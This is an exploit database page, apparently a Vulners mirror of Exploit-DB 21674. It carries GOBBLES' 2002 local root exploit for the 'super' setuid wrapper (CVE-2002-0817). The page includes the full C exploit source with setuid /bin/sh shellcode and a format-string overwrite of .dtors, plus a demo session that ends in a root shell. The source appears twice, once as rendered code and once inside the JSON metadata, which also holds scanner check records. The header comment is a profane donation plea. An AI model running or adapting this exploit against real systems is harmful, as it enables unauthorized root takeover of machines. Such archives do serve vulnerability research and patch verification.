Search...

William Deich Super 3.x SysLog Format String Vulnerability

2002-07-31T00:00:00

ID EDB-ID:21674
Type exploitdb
Reporter gobbles
Modified 2002-07-31T00:00:00

Description

William Deich Super 3.x SysLog Format String Vulnerability. CVE-2002-0817 . Local exploit for linux platform

                                        
                                            source: http://www.securityfocus.com/bid/5367/info

super is prone to a format string vulnerability. This problem is due to incorrect use of the syslog() function to log error messages. It is possible to corrupt memory by passing format strings through the vulnerable logging function. This may potentially be exploited to overwrite arbitrary locations in memory with attacker-specified values. 

/*
 * SAVE DEFCON..HELP GOBBLES..SAVE DEFCON..HELP GOBBLES
 *
 * When GOBBLES say he and he security team
 * are non-profit. He really mean NON-profit.
 * This means GOBBLES and he GOBBLES Security
 * Labs (GSL) friends do not have much funds.
 *
 * GOBBLES was hoping to receive the money 
 * for speaking at the defcon gathering of
 * security enthusiasts up front. So he could buy 
 * and pay for he ticket to Las Vegas from the great city
 * of Baltimore where he currently resides.
 *
 * GOBBLES is not selling out.  GOBBLES is just admitting that he
 * need your help.  Please, help GOBBLES!
 *
 * After many e-mails to defcon organisers it became
 * apparent to GOBBLES this was not going to happen.
 * This mean GOBBLES has no way of getting to defcon.
 * This also mean GOBBLES cannot deliver he talk that
 * are named "Wolves among us". Alot of time and work
 * went into the preperation of this talk and it was
 * to be the grand finale of the year of the turkey
 * (2002). With many new 0-day to give out and many
 * great anouncements to be made.
 *
 * Thanks to Jeff Moss (dt@defcon.org, jmoss@blackhat.com) 
 * you, the defcon attendee, may very well get cheated out 
 * of attending one of the most provocative and daring
 * events defcon history has ever seen. 
 *
 * 	!!! ITS NOT TOO LATE..BUT HURRY !!!
 * 
 * Help GOBBLES go to defcon. GOBBLES give so much to
 * the community..is it not time the community now help
 * a poverty stricken turkey to spread his wings and fly
 * towards fame and glory? 
 *
 * Reasons why you should help GOBBLES get to defcon:
 *  
 * -- Paying for GOBBLES plane ticket to Vegas is better than spending $300 on a stripper
 *
 * -- Seeing GOBBLES present naked: Priceless.
 * 
 * -- Zeroday (possible hardcover) GOBBLES comic
 *
 * -- A chance to buy GOBBLES art
 *
 * -- A chance to receive _free_ GOBBLES T-shirts
 * 
 * -- Copies of those exploits you couldn't code
 *
 *
 * What does GOBBLES need?
 *
 * Basically GOBBLES need to round up 300 US dollars before saturday.
 * "Wolves among us" is sheduled for the last day of defcon.
 * Namely 3PM on Sunday August 4th. As you can very well imagine
 * this talk was going to blow the lid off of more dirty secrets
 * than there are noodles in China. With your help GOBBLES can still 
 * make this happen. So what GOBBLES is asking for is a little helping
 * hand from the community. If anyone has the funds to sponsor GOBBLES
 * to come to defcon please contact GOBBBLES at GOBBLES@hushmail.com.
 *
 *     !!! TURKEY SUPPORTERS...DO NOT LET THE TURKEY BE SILENCED !!!
 *
 * GOBBLES accepts Western Union payments.  GOBBLES will not accept anything
 * beyond the amount needed for travel to Vegas and back.  GOBBLES is not 
 * selling out, GOBBLES is asking help from those penetrators and researchers
 * that GOBBLES helps every day.
 *
 * In other news, ISS rejected GOBBLES request for a job application.  It 
 * seems that they're afraid of getting scalp'd.
 *
 * 			     Political statement:
 * HALT THE SNOSOFT ABUSE OF 14 YEAR OLDS. MAKING CHILDREN SLAVE OVER 3 LINE
 * PERL EXPLOITS FOR LESS THAN MINIMUM WAGE IS NOT VERY ETHICAL !!!
 *
 * FREE DVDMAN FREE DVDMAN FREE DVDMAN FREE DVDMAN FREE DVDMAN FREE DVDMAN  
 * JAIL W00W00 JAIL W00W00 JAIL W000W0 JAIL W00W00 JAIL W00W00 JAIL W00W00
 * FUCK ADM FUCK ADM FUCK ADM FUCK ADM FUCK ADM FUCK ADM FUCK ADM FUCK ADM
 */

/*
 * GOBBLES-own-super.c 
 *  -- root exploit for root hole in root wrapper
 * 
 * Super is sudo wannabe that boasts much security.
 * GOBBLES think people who write setuid wrappers
 * should learn to program securely before opening
 * big hoohoo about how secure program is.
 *
 * Current super version (3.18):
   -- ftp://ftp.ucolick.org/pub/users/will/
 * 
 * Super maintainer say following about he code:
 *
 * "Super allows an admin to control access to files
 *  and functions for users. It is similar to sudo, but 
 *  uses a different approach in the configuration file."
 *
 * Problem:
 * 
 * When super is compiled to use syslog(3) for its logging
 * of error messages the following lines makes pre-auth
 * local root exploitation rather trivial:
 * 
 * From error.c 
 * ... 
 * #define SysLog(pri, buf) syslog((pri), (buf))
 * ...
 * SysLog(error_priority, buf);
 * ...
 *
 * This means users that are not in the super config file
 * will be able to execute code with root priviledges.
 *
 * "Super acts as a SetUID wrapper around system commands
 *  to make sure the commands are executed safely, and
 *  only by authorized users."
 *
 * 		hehehe ;PPpPPPPp
 *
 * Love, 
 * GOBBLES
 * GOBBLES@hushmail.com
 * 
 * Official site: http://www.bugtraq.org
 * Official mirror: http://www.immunitysec.com/GOBBLES/
 */

/* Proof Of Concept:

$ gcc GOBBLES-own-super.c -o GOBBLES-own-super   
$ ./GOBBLES-own-super 

Usage: 
./GOBBLES-own-super -t &lt;.dtors address&gt; [ -o &lt;offset&gt; -A &lt;allignment&gt; ]

$ objdump -s -j .dtors /usr/local/bin/super

/usr/local/bin/super:     file format elf32-i386

Contents of section .dtors:
 8063f7c ffffffff 00000000                    ........        

$ ./GOBBLES-own-super -t 0x8063f7c
. target @ 0x8063f80
. shellcode @ 0xbfffffb0
. username: 9 bytes
super: No such super command as `xx��%.49103x%29$hn%.16305x%30$hn'.
sh-2.05# 

*/

#include &lt;stdio.h&gt;
#include &lt;string.h&gt;
#include &lt;stdlib.h&gt;
#include &lt;unistd.h&gt;
#include &lt;pwd.h&gt;
#include &lt;sys/types.h&gt;

#define ALLIGN		2 
#define DPA		29 	

#define SUPER		"/usr/local/bin/super"

void buildstring(unsigned long t, unsigned long w, int dpa, int allign);
void stuff(void);

extern char **environ;
char string[256];

int
main(int argc, char **argv)
{
	unsigned long t, w;
	int dpa, allign, shift = 0;
	char c, *store;	

	if(argc == 1) {
		fprintf(stderr, "\nUsage: \n%s -t &lt;.dtors address&gt; [ -o &lt;offset&gt; -A &lt;allignment&gt; ]\n", argv[0]);
		exit(0);
	}
	
	allign = ALLIGN;
	dpa = DPA;
	
	while((c = getopt(argc, argv, "t:o:A:")) != EOF) {
		switch(c) {
			case 't':
				sscanf(optarg, "%p", &store);
				t = (long)store;
			 	t += 4;
				break;
			case 'o':
				dpa = atoi(optarg);
				break;
			case 'A':
				allign = atoi(optarg);
				break;
			default:
				fprintf(stderr, "hehehe ;PPppPPPp\n");
				exit(0);
		}
	}
	
	store = NULL;

	if((store = getenv("GOBBLES")) == NULL) {
		stuff();
		if(execve(argv[0], argv, environ)) {
			fprintf(stderr, ". problem re-executing\n");
			exit(1);
		}
	}
	
	w = (long)store;
	// shift is signed so this works both ways
	shift = (strlen(argv[0]) - strlen(SUPER));
	w += shift;
	
	fprintf(stderr, ". target @ %p\n. shellcode @ %p\n", t, w);
			
	buildstring(t, w, dpa, allign);
	
	if(execl(SUPER, "super", string, NULL)) {
		fprintf(stderr, "error executing\n");
		exit(1);
	}
}

void 
buildstring(unsigned long t, unsigned long w, int dpa, int allign)
{
	unsigned int un, deux, x, b[4], namelen;
	char a_buf[4];
	struct passwd *pass;	

	memset(string, '\0', sizeof(string));
	memset(a_buf, '\0', sizeof(a_buf));
	
	if((pass = getpwuid(getuid())) == NULL) {
		fprintf(stderr, ". can't find your username\n");
		exit(1);
	}
 
	namelen = strlen(pass-&gt;pw_name);

	fprintf(stderr, ". username: %d bytes\n", namelen);

	for(x = 0; x &lt; allign && x &lt; sizeof(a_buf); x++)
		a_buf[x] = 'x';

	b[0] = (t & 0x000000ff);
	b[1] = (t & 0x0000ff00) &gt;&gt; 8;
	b[2] = (t & 0x00ff0000) &gt;&gt; 16;
	b[3] = (t & 0xff000000) &gt;&gt; 24; 

	un = (w &gt;&gt; 16) & 0xffff;
	deux = w & 0xffff; 

	if(un &lt; deux) {
                snprintf(string, sizeof(string)-1, 
			"%s" 
			"%c%c%c%c%c%c%c%c"  
			"%%.%hdx" "%%%d$hn" 
			"%%.%hdx" "%%%d$hn",
                        a_buf, 
			b[0] + 2, b[1], b[2], b[3], b[0], b[1], b[2], b[3],
                        un - (8 + allign + 29 + namelen), 
			dpa, deux - un, dpa + 1 
			
		);
        }
        else {
                snprintf(string, sizeof(string)-1, 
			"%s" 
			"%c%c%c%c%c%c%c%c" 
			"%%.%hdx" "%%%d$hn" 
			"%%.%hdx" "%%%d$hn",
                        a_buf, 
			b[0], b[1], b[2], b[3], b[0] + 2, b[1], b[2], b[3],
                        deux - (8 + allign + 29 + namelen), 
			dpa, un-deux, dpa + 1
			
		);
        }
}

void  
stuff(void)
{
        char code[] = // the setuid 0 with the execve of the /bin/sh
	"\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31"
	"\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d"
	"\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff"
	"\xff\x2f\x62\x69\x6e\x2f\x73\x68\x58";
	setenv("GOBBLES", code, 1);
}

JSON Vulners Source

Initial Source

{"id": "EDB-ID:21674", "type": "exploitdb", "bulletinFamily": "exploit", "title": "William Deich Super 3.x SysLog Format String Vulnerability", "description": "William Deich Super 3.x SysLog Format String Vulnerability. CVE-2002-0817 . Local exploit for linux platform", "published": "2002-07-31T00:00:00", "modified": "2002-07-31T00:00:00", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/21674/", "reporter": "gobbles", "references": [], "cvelist": ["CVE-2002-0817"], "lastseen": "2016-02-02T17:01:00", "viewCount": 3, "enchantments": {"score": {"value": 6.5, "vector": "NONE", "modified": "2016-02-02T17:01:00", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2002-0817"]}, {"type": "nessus", "idList": ["DEBIAN_DSA-139.NASL"]}, {"type": "osvdb", "idList": ["OSVDB:5075"]}, {"type": "openvas", "idList": ["OPENVAS:53401"]}], "modified": "2016-02-02T17:01:00", "rev": 2}, "vulnersScore": 6.5}, "sourceHref": "https://www.exploit-db.com/download/21674/", "sourceData": "source: http://www.securityfocus.com/bid/5367/info\r\n\r\nsuper is prone to a format string vulnerability. This problem is due to incorrect use of the syslog() function to log error messages. It is possible to corrupt memory by passing format strings through the vulnerable logging function. This may potentially be exploited to overwrite arbitrary locations in memory with attacker-specified values. \r\n\r\n/*\r\n * SAVE DEFCON..HELP GOBBLES..SAVE DEFCON..HELP GOBBLES\r\n *\r\n * When GOBBLES say he and he security team\r\n * are non-profit. He really mean NON-profit.\r\n * This means GOBBLES and he GOBBLES Security\r\n * Labs (GSL) friends do not have much funds.\r\n *\r\n * GOBBLES was hoping to receive the money \r\n * for speaking at the defcon gathering of\r\n * security enthusiasts up front. So he could buy \r\n * and pay for he ticket to Las Vegas from the great city\r\n * of Baltimore where he currently resides.\r\n *\r\n * GOBBLES is not selling out. GOBBLES is just admitting that he\r\n * need your help. Please, help GOBBLES!\r\n *\r\n * After many e-mails to defcon organisers it became\r\n * apparent to GOBBLES this was not going to happen.\r\n * This mean GOBBLES has no way of getting to defcon.\r\n * This also mean GOBBLES cannot deliver he talk that\r\n * are named \"Wolves among us\". Alot of time and work\r\n * went into the preperation of this talk and it was\r\n * to be the grand finale of the year of the turkey\r\n * (2002). With many new 0-day to give out and many\r\n * great anouncements to be made.\r\n *\r\n * Thanks to Jeff Moss (dt@defcon.org, jmoss@blackhat.com) \r\n * you, the defcon attendee, may very well get cheated out \r\n * of attending one of the most provocative and daring\r\n * events defcon history has ever seen. \r\n *\r\n * \t!!! ITS NOT TOO LATE..BUT HURRY !!!\r\n * \r\n * Help GOBBLES go to defcon. GOBBLES give so much to\r\n * the community..is it not time the community now help\r\n * a poverty stricken turkey to spread his wings and fly\r\n * towards fame and glory? \r\n *\r\n * Reasons why you should help GOBBLES get to defcon:\r\n * \r\n * -- Paying for GOBBLES plane ticket to Vegas is better than spending $300 on a stripper\r\n *\r\n * -- Seeing GOBBLES present naked: Priceless.\r\n * \r\n * -- Zeroday (possible hardcover) GOBBLES comic\r\n *\r\n * -- A chance to buy GOBBLES art\r\n *\r\n * -- A chance to receive _free_ GOBBLES T-shirts\r\n * \r\n * -- Copies of those exploits you couldn't code\r\n *\r\n *\r\n * What does GOBBLES need?\r\n *\r\n * Basically GOBBLES need to round up 300 US dollars before saturday.\r\n * \"Wolves among us\" is sheduled for the last day of defcon.\r\n * Namely 3PM on Sunday August 4th. As you can very well imagine\r\n * this talk was going to blow the lid off of more dirty secrets\r\n * than there are noodles in China. With your help GOBBLES can still \r\n * make this happen. So what GOBBLES is asking for is a little helping\r\n * hand from the community. If anyone has the funds to sponsor GOBBLES\r\n * to come to defcon please contact GOBBBLES at GOBBLES@hushmail.com.\r\n *\r\n * !!! TURKEY SUPPORTERS...DO NOT LET THE TURKEY BE SILENCED !!!\r\n *\r\n * GOBBLES accepts Western Union payments. GOBBLES will not accept anything\r\n * beyond the amount needed for travel to Vegas and back. GOBBLES is not \r\n * selling out, GOBBLES is asking help from those penetrators and researchers\r\n * that GOBBLES helps every day.\r\n *\r\n * In other news, ISS rejected GOBBLES request for a job application. It \r\n * seems that they're afraid of getting scalp'd.\r\n *\r\n * \t\t\t Political statement:\r\n * HALT THE SNOSOFT ABUSE OF 14 YEAR OLDS. MAKING CHILDREN SLAVE OVER 3 LINE\r\n * PERL EXPLOITS FOR LESS THAN MINIMUM WAGE IS NOT VERY ETHICAL !!!\r\n *\r\n * FREE DVDMAN FREE DVDMAN FREE DVDMAN FREE DVDMAN FREE DVDMAN FREE DVDMAN \r\n * JAIL W00W00 JAIL W00W00 JAIL W000W0 JAIL W00W00 JAIL W00W00 JAIL W00W00\r\n * FUCK ADM FUCK ADM FUCK ADM FUCK ADM FUCK ADM FUCK ADM FUCK ADM FUCK ADM\r\n */\r\n\r\n/*\r\n * GOBBLES-own-super.c \r\n * -- root exploit for root hole in root wrapper\r\n * \r\n * Super is sudo wannabe that boasts much security.\r\n * GOBBLES think people who write setuid wrappers\r\n * should learn to program securely before opening\r\n * big hoohoo about how secure program is.\r\n *\r\n * Current super version (3.18):\r\n -- ftp://ftp.ucolick.org/pub/users/will/\r\n * \r\n * Super maintainer say following about he code:\r\n *\r\n * \"Super allows an admin to control access to files\r\n * and functions for users. It is similar to sudo, but \r\n * uses a different approach in the configuration file.\"\r\n *\r\n * Problem:\r\n * \r\n * When super is compiled to use syslog(3) for its logging\r\n * of error messages the following lines makes pre-auth\r\n * local root exploitation rather trivial:\r\n * \r\n * From error.c \r\n * ... \r\n * #define SysLog(pri, buf) syslog((pri), (buf))\r\n * ...\r\n * SysLog(error_priority, buf);\r\n * ...\r\n *\r\n * This means users that are not in the super config file\r\n * will be able to execute code with root priviledges.\r\n *\r\n * \"Super acts as a SetUID wrapper around system commands\r\n * to make sure the commands are executed safely, and\r\n * only by authorized users.\"\r\n *\r\n * \t\thehehe ;PPpPPPPp\r\n *\r\n * Love, \r\n * GOBBLES\r\n * GOBBLES@hushmail.com\r\n * \r\n * Official site: http://www.bugtraq.org\r\n * Official mirror: http://www.immunitysec.com/GOBBLES/\r\n */\r\n\r\n/* Proof Of Concept:\r\n\r\n$ gcc GOBBLES-own-super.c -o GOBBLES-own-super \r\n$ ./GOBBLES-own-super \r\n\r\nUsage: \r\n./GOBBLES-own-super -t <.dtors address> [ -o <offset> -A <allignment> ]\r\n\r\n$ objdump -s -j .dtors /usr/local/bin/super\r\n\r\n/usr/local/bin/super: file format elf32-i386\r\n\r\nContents of section .dtors:\r\n 8063f7c ffffffff 00000000 ........ \r\n\r\n$ ./GOBBLES-own-super -t 0x8063f7c\r\n. target @ 0x8063f80\r\n. shellcode @ 0xbfffffb0\r\n. username: 9 bytes\r\nsuper: No such super command as `xx\ufffd\ufffd%.49103x%29$hn%.16305x%30$hn'.\r\nsh-2.05# \r\n\r\n*/\r\n\r\n#include <stdio.h>\r\n#include <string.h>\r\n#include <stdlib.h>\r\n#include <unistd.h>\r\n#include <pwd.h>\r\n#include <sys/types.h>\r\n\r\n#define ALLIGN\t\t2 \r\n#define DPA\t\t29 \t\r\n\r\n#define SUPER\t\t\"/usr/local/bin/super\"\r\n\r\nvoid buildstring(unsigned long t, unsigned long w, int dpa, int allign);\r\nvoid stuff(void);\r\n\r\nextern char **environ;\r\nchar string[256];\r\n\r\nint\r\nmain(int argc, char **argv)\r\n{\r\n\tunsigned long t, w;\r\n\tint dpa, allign, shift = 0;\r\n\tchar c, *store;\t\r\n\r\n\tif(argc == 1) {\r\n\t\tfprintf(stderr, \"\\nUsage: \\n%s -t <.dtors address> [ -o <offset> -A <allignment> ]\\n\", argv[0]);\r\n\t\texit(0);\r\n\t}\r\n\t\r\n\tallign = ALLIGN;\r\n\tdpa = DPA;\r\n\t\r\n\twhile((c = getopt(argc, argv, \"t:o:A:\")) != EOF) {\r\n\t\tswitch(c) {\r\n\t\t\tcase 't':\r\n\t\t\t\tsscanf(optarg, \"%p\", &store);\r\n\t\t\t\tt = (long)store;\r\n\t\t\t \tt += 4;\r\n\t\t\t\tbreak;\r\n\t\t\tcase 'o':\r\n\t\t\t\tdpa = atoi(optarg);\r\n\t\t\t\tbreak;\r\n\t\t\tcase 'A':\r\n\t\t\t\tallign = atoi(optarg);\r\n\t\t\t\tbreak;\r\n\t\t\tdefault:\r\n\t\t\t\tfprintf(stderr, \"hehehe ;PPppPPPp\\n\");\r\n\t\t\t\texit(0);\r\n\t\t}\r\n\t}\r\n\t\r\n\tstore = NULL;\r\n\r\n\tif((store = getenv(\"GOBBLES\")) == NULL) {\r\n\t\tstuff();\r\n\t\tif(execve(argv[0], argv, environ)) {\r\n\t\t\tfprintf(stderr, \". problem re-executing\\n\");\r\n\t\t\texit(1);\r\n\t\t}\r\n\t}\r\n\t\r\n\tw = (long)store;\r\n\t// shift is signed so this works both ways\r\n\tshift = (strlen(argv[0]) - strlen(SUPER));\r\n\tw += shift;\r\n\t\r\n\tfprintf(stderr, \". target @ %p\\n. shellcode @ %p\\n\", t, w);\r\n\t\t\t\r\n\tbuildstring(t, w, dpa, allign);\r\n\t\r\n\tif(execl(SUPER, \"super\", string, NULL)) {\r\n\t\tfprintf(stderr, \"error executing\\n\");\r\n\t\texit(1);\r\n\t}\r\n}\r\n\r\nvoid \r\nbuildstring(unsigned long t, unsigned long w, int dpa, int allign)\r\n{\r\n\tunsigned int un, deux, x, b[4], namelen;\r\n\tchar a_buf[4];\r\n\tstruct passwd *pass;\t\r\n\r\n\tmemset(string, '\\0', sizeof(string));\r\n\tmemset(a_buf, '\\0', sizeof(a_buf));\r\n\t\r\n\tif((pass = getpwuid(getuid())) == NULL) {\r\n\t\tfprintf(stderr, \". can't find your username\\n\");\r\n\t\texit(1);\r\n\t}\r\n \r\n\tnamelen = strlen(pass->pw_name);\r\n\r\n\tfprintf(stderr, \". username: %d bytes\\n\", namelen);\r\n\r\n\tfor(x = 0; x < allign && x < sizeof(a_buf); x++)\r\n\t\ta_buf[x] = 'x';\r\n\r\n\tb[0] = (t & 0x000000ff);\r\n\tb[1] = (t & 0x0000ff00) >> 8;\r\n\tb[2] = (t & 0x00ff0000) >> 16;\r\n\tb[3] = (t & 0xff000000) >> 24; \r\n\r\n\tun = (w >> 16) & 0xffff;\r\n\tdeux = w & 0xffff; \r\n\r\n\tif(un < deux) {\r\n snprintf(string, sizeof(string)-1, \r\n\t\t\t\"%s\" \r\n\t\t\t\"%c%c%c%c%c%c%c%c\" \r\n\t\t\t\"%%.%hdx\" \"%%%d$hn\" \r\n\t\t\t\"%%.%hdx\" \"%%%d$hn\",\r\n a_buf, \r\n\t\t\tb[0] + 2, b[1], b[2], b[3], b[0], b[1], b[2], b[3],\r\n un - (8 + allign + 29 + namelen), \r\n\t\t\tdpa, deux - un, dpa + 1 \r\n\t\t\t\r\n\t\t);\r\n }\r\n else {\r\n snprintf(string, sizeof(string)-1, \r\n\t\t\t\"%s\" \r\n\t\t\t\"%c%c%c%c%c%c%c%c\" \r\n\t\t\t\"%%.%hdx\" \"%%%d$hn\" \r\n\t\t\t\"%%.%hdx\" \"%%%d$hn\",\r\n a_buf, \r\n\t\t\tb[0], b[1], b[2], b[3], b[0] + 2, b[1], b[2], b[3],\r\n deux - (8 + allign + 29 + namelen), \r\n\t\t\tdpa, un-deux, dpa + 1\r\n\t\t\t\r\n\t\t);\r\n }\r\n}\r\n\r\nvoid \r\nstuff(void)\r\n{\r\n char code[] = // the setuid 0 with the execve of the /bin/sh\r\n\t\"\\x31\\xc0\\x31\\xdb\\xb0\\x17\\xcd\\x80\\xeb\\x1f\\x5e\\x89\\x76\\x08\\x31\"\r\n\t\"\\xc0\\x88\\x46\\x07\\x89\\x46\\x0c\\xb0\\x0b\\x89\\xf3\\x8d\\x4e\\x08\\x8d\"\r\n\t\"\\x56\\x0c\\xcd\\x80\\x31\\xdb\\x89\\xd8\\x40\\xcd\\x80\\xe8\\xdc\\xff\\xff\"\r\n\t\"\\xff\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x68\\x58\";\r\n\tsetenv(\"GOBBLES\", code, 1);\r\n}\r\n\r\n", "osvdbidlist": ["5075"]}

{"cve": [{"lastseen": "2020-10-03T11:36:59", "description": "Format string vulnerability in super for Linux allows local users to gain root privileges via a long command line argument.", "edition": 3, "cvss3": {}, "published": "2002-08-12T04:00:00", "title": "CVE-2002-0817", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2002-0817"], "modified": "2016-10-18T02:22:00", "cpe": ["cpe:/a:william_deich:super:3.16", "cpe:/a:william_deich:super:3.18", "cpe:/a:william_deich:super:3.12", "cpe:/a:william_deich:super:3.17"], "id": "CVE-2002-0817", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-0817", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:william_deich:super:3.18:*:*:*:*:*:*:*", "cpe:2.3:a:william_deich:super:3.17:*:*:*:*:*:*:*", "cpe:2.3:a:william_deich:super:3.12:*:*:*:*:*:*:*", "cpe:2.3:a:william_deich:super:3.16:*:*:*:*:*:*:*"]}], "osvdb": [{"lastseen": "2017-04-28T13:19:59", "bulletinFamily": "software", "cvelist": ["CVE-2002-0817"], "edition": 1, "description": "# No description provided by the source\n\n## References:\nISS X-Force ID: 9741\n[CVE-2002-0817](https://vulners.com/cve/CVE-2002-0817)\nBugtraq ID: 5367\n", "modified": "2004-04-08T23:13:57", "published": "2004-04-08T23:13:57", "id": "OSVDB:5075", "href": "https://vulners.com/osvdb/OSVDB:5075", "title": "Linux Super Format String Elevated Privileges", "type": "osvdb", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2017-07-24T12:50:22", "bulletinFamily": "scanner", "cvelist": ["CVE-2002-0817"], "description": "The remote host is missing an update to super\nannounced via advisory DSA 139-1.", "modified": "2017-07-07T00:00:00", "published": "2008-01-17T00:00:00", "id": "OPENVAS:53401", "href": "http://plugins.openvas.org/nasl.php?oid=53401", "type": "openvas", "title": "Debian Security Advisory DSA 139-1 (super)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_139_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 139-1\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largerly excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"GOBBLES found an insecure use of format strings in the super package.\nThe included program super is intended to provide access to certain\nsystem users for particular users and programs, similar to the program\nsuper. Exploiting this format string vulnerability a local user can\ngain unauthorized root accesss.\n\nThis problem has been fixed in version 3.12.2-2.1 for the old stable\ndistribution (potato), in version 3.16.1-1.1 for the current stable\ndistribution (woody) and in version 3.18.0-3 for the unstable\ndistribution (sid).\n\nWe recommend that you upgrade your super package immediately.\";\ntag_summary = \"The remote host is missing an update to super\nannounced via advisory DSA 139-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%20139-1\";\n\nif(description)\n{\n script_id(53401);\n script_cve_id(\"CVE-2002-0817\");\n script_bugtraq_id(5367);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-01-17 22:24:46 +0100 (Thu, 17 Jan 2008)\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Debian Security Advisory DSA 139-1 (super)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"super\", ver:\"3.12.2-2.1\", rls:\"DEB2.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"super\", ver:\"3.16.1-1.1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2021-01-06T09:44:51", "description": "GOBBLES found an insecure use of format strings in the super package.\nThe included program super is intended to provide access to certain\nsystem users for particular users and programs, similar to the program\nsudo. Exploiting this format string vulnerability a local user can\ngain unauthorized root access.", "edition": 24, "published": "2004-09-29T00:00:00", "title": "Debian DSA-139-1 : super - format string vulnerability", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2002-0817"], "modified": "2004-09-29T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:2.2", "cpe:/o:debian:debian_linux:3.0", "p-cpe:/a:debian:debian_linux:super"], "id": "DEBIAN_DSA-139.NASL", "href": "https://www.tenable.com/plugins/nessus/14976", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-139. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(14976);\n script_version(\"1.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2002-0817\");\n script_bugtraq_id(5367);\n script_xref(name:\"DSA\", value:\"139\");\n\n script_name(english:\"Debian DSA-139-1 : super - format string vulnerability\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"GOBBLES found an insecure use of format strings in the super package.\nThe included program super is intended to provide access to certain\nsystem users for particular users and programs, similar to the program\nsudo. Exploiting this format string vulnerability a local user can\ngain unauthorized root access.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.debian.org/security/2002/dsa-139\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the super package immediately.\n\nThis problem has been fixed in version 3.12.2-2.1 for the old stable\ndistribution (potato), in version 3.16.1-1.1 for the current stable\ndistribution (woody) and in version 3.18.0-3 for the unstable\ndistribution (sid).\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n 